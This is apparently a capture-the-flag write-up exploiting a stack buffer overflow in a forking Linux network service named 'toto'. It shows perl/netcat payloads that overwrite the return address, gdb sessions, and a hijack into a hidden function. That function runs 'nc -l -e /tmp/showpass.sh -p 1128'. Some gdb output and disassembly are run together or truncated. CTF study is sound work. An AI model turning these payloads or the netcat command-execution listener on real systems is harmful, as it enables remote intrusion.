We downloaded a file called "toto",
<presyntaxhighlight lang="bash">
# file toto
toto: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
# ./toto 1234
</presyntaxhighlight>
On a client, we get:
<presyntaxhighlight lang="bash">
> nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe: blabla
De dieu, tu t'en souviens pas? C'est balot!
</presyntaxhighlight>
It's an exploitation, so on the server, we debug the program (it forks, to we follow the child):
<presyntaxhighlight lang="bash">
# gdb -q ./toto
(gdb) set follow-fork-mode child
(gdb) r 1234
Starting program: /root/toto 1234
</presyntaxhighlight>
On the client, let's do:
<presyntaxhighlight lang="bash">
> echo `perl -e 'print "A"x24 '`| nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe:
</presyntaxhighlight>
And the server segfaults:
<presyntaxhighlight lang="bash">
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 1962]
0x41414141 in ?? ()
</presyntaxhighlight>The backtrace is definitely screwed, so we just have a quick look:
<presyntaxhighlight lang="bash">(gdb) bt#0 0x41414141 in ?? ()#1 0x0000000a in ?? ()#2 0x00000006 in ?? ()#3 0xbfa7476c in ?? ()#4 0xb7f73ff4 in ?? () from /lib/ld-linux.so.2#5 0xb7f57b0c in ?? ()#6 0x00000001 in ?? ()#7 0xbfa746b4 in ?? ()#8 0xf3b80002 in ?? ()#9 0x01c710ac in ?? ()#10 0x00000000 in ?? ()</syntaxhighlight> so we just have a quick look: <syntaxhighlight lang="asm">
0804888c <checkPass>:
804888d: 89 e5 mov ebp,esp
804888f: 83 ec 28 sub esp,0x28
8048892: c7 44 24 08 20 00 00 mov DWORD PTR [esp+0x8],0x20 <------
8048899: 00
804889a: 8d 45 f0 lea eax,[ebp-0x10]
80488ac: c9 leave
80488ad: c3 ret
</presyntaxhighlight>
We shipped 24 bytes, so we wrote the return address. Let break on the ret of checkPass:
<presyntaxhighlight lang="asm">
(gdb) b *0x80488ad
Breakpoint 1 at 0x80488ad
(gdb) b *0x80488adBreakpoint 1 at 0x80488ad c
Breakpoint 1, 0x080488ad in checkPass ()
Current language: auto; currently asm
0xbfe019cc: 0xb5df0002 0x01c710ac 0x00000000 0x00000000
0xbfe019dc: 0xd4040002 0x00000000 0x00000000 0x00000000
</presyntaxhighlight>
So we rewrote with 0x41414141. What to put here ?
By having a very quick look at the binary, there is an interesting function called pwnthis:
<presyntaxhighlight lang="asm">
(gdb) disassemble pwnthis
Dump of assembler code for function pwnthis:
0x0804888b <pwnthis+156>: ret
</presyntaxhighlight>
So we are going to write the address to return there and break before the system to see the content:
<presyntaxhighlight lang="bash">
> echo `perl -e 'print "A"x20 . "\xef\x87\x04\x08" , "AAAA" . "CCCC" '`| nc 172.16.199.131 1234
Adieu l'ami, dis-voir c'que c'est ton mot de passe:
</presyntaxhighlight>
And on the server side:
<presyntaxhighlight lang="bash">
Breakpoint 2, 0x0804887e in pwnthis ()
(gdb) x /wx $esp
(gdb) x /s 0xbf9e3c83
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 1128
</presyntaxhighlight>
Amazing, it's gonna open a local port on 1128. You can modify the port, since it's part of the buffer you write
0xbf9e3c83: "nc -l -e /tmp/showpass.sh -p 1128"
So now, we just need to connect to the remote port to execute the showpass.sh. The server was dead, validation was not possible.
<presyntaxhighlight lang="bash">
> nc 172.16.199.131 1128
</presyntaxhighlight>